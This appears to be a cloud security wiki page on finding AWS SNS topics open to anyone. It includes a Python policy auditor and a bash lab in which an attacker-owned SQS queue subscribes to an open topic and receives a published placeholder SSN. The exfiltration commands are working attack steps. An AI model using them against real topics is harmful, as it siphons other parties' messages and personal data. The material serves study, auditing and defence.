AWS - SNS Unauthenticated Enum
SNS
For more information about SNS check:
Open to All
When you configure an SNS topic from the web console, it is possible to indicate that Everyone can publish and subscribe to the topic:
So, if you find the ARN of topics inside the account (or by brute forcing potential topic names), you can check whether you can publish or subscribe to them.
This is equivalent to the SNS topic's resource policy allowing `sns:Subscribe` to `*` (or to external accounts): any principal can then create a subscription that delivers all future topic messages to an SQS queue they own. When the queue owner initiates the subscription, no human confirmation is required for SQS endpoints.
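As an added example (not part of the original page or of HackTricks' own code), this Python sketch audits a topic policy document for the condition described above: Allow statements that grant `sns:Subscribe` or `sns:Publish` to `*` or to an account other than the topic owner. The sample policies, account IDs, ARNs and the `audit_topic_policy` helper are constructed for illustration.

```python
import fnmatch
import json
import re

RISKY_ACTIONS = ("sns:subscribe", "sns:publish")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _aws_principals(stmt):
    # "*" and {"AWS": "*"} both mean anyone; service principals are ignored.
    principal = stmt.get("Principal", {})
    if isinstance(principal, dict):
        return [str(p) for p in _as_list(principal.get("AWS", []))]
    return ["*"] if principal == "*" else []

def audit_topic_policy(policy_json, owner_account):
    """List (sid, action, principal) grants open to anyone or another account.
    Simplification: statements with a Condition are skipped (review those by
    hand); NotAction and NotPrincipal are not handled."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        patterns = [str(a).lower() for a in _as_list(stmt.get("Action", []))]
        granted = [a for a in RISKY_ACTIONS
                   if any(fnmatch.fnmatchcase(a, p) for p in patterns)]
        for principal in _aws_principals(stmt):
            account = re.search(r"\d{12}", principal)
            if account and account.group() == owner_account:
                continue  # principal belongs to the topic owner's account
            findings += [(stmt.get("Sid", ""), a, principal) for a in granted]
    return findings

# Constructed sample policies; account IDs and ARNs are placeholders.
TOPIC = "arn:aws:sns:us-east-1:111122223333:example-topic"
OPEN_SUBSCRIBE = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OpenSubscribe", "Effect": "Allow", "Principal": "*",
     "Action": "sns:Subscribe", "Resource": TOPIC}]})
OWNER_ONLY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OwnerOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["SNS:Subscribe", "SNS:Publish"], "Resource": TOPIC,
     "Condition": {"StringEquals": {"AWS:SourceOwner": "111122223333"}}}]})
CROSS_ACCOUNT = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "Partner", "Effect": "Allow", "Action": "sns:*", "Resource": TOPIC,
     "Principal": {"AWS": "arn:aws:iam::444455556666:root"}}]})

if __name__ == "__main__":
    for doc in (OPEN_SUBSCRIBE, OWNER_ONLY, CROSS_ACCOUNT):
        print(audit_topic_policy(doc, "111122223333"))
```

For a real topic, the policy string to pass in is the `Policy` attribute returned by `aws sns get-topic-attributes`.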
Example (us-east-1)
```bash
REGION=us-east-1

# Victim account (topic owner)
VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)

# Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"OpenSubscribe","Effect":"Allow","Principal":"*","Action":"sns:Subscribe","Resource":"$VICTIM_TOPIC_ARN"}]}
JSON
aws sns set-topic-attributes --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --attribute-name Policy --attribute-value file:///tmp/topic-policy.json

# Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue --queue-name attacker-exfil-queue-$(date +%s) --region $REGION --query QueueUrl --output text)
ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowVictimTopicSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$ATTACKER_Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$VICTIM_TOPIC_ARN"}}}]}
JSON
aws sqs set-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attributes Policy="$(cat /tmp/sqs-policy.json)"

# Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --protocol sqs --notification-endpoint "$ATTACKER_Q_ARN" --query SubscriptionArn --output text)

# Validation: publish and receive
aws sns publish --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --message '{pii:ssn:123-45-6789}'
aws sqs receive-message --queue-url "$ATTACKER_Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --query 'Messages[0].Body' --output text
```

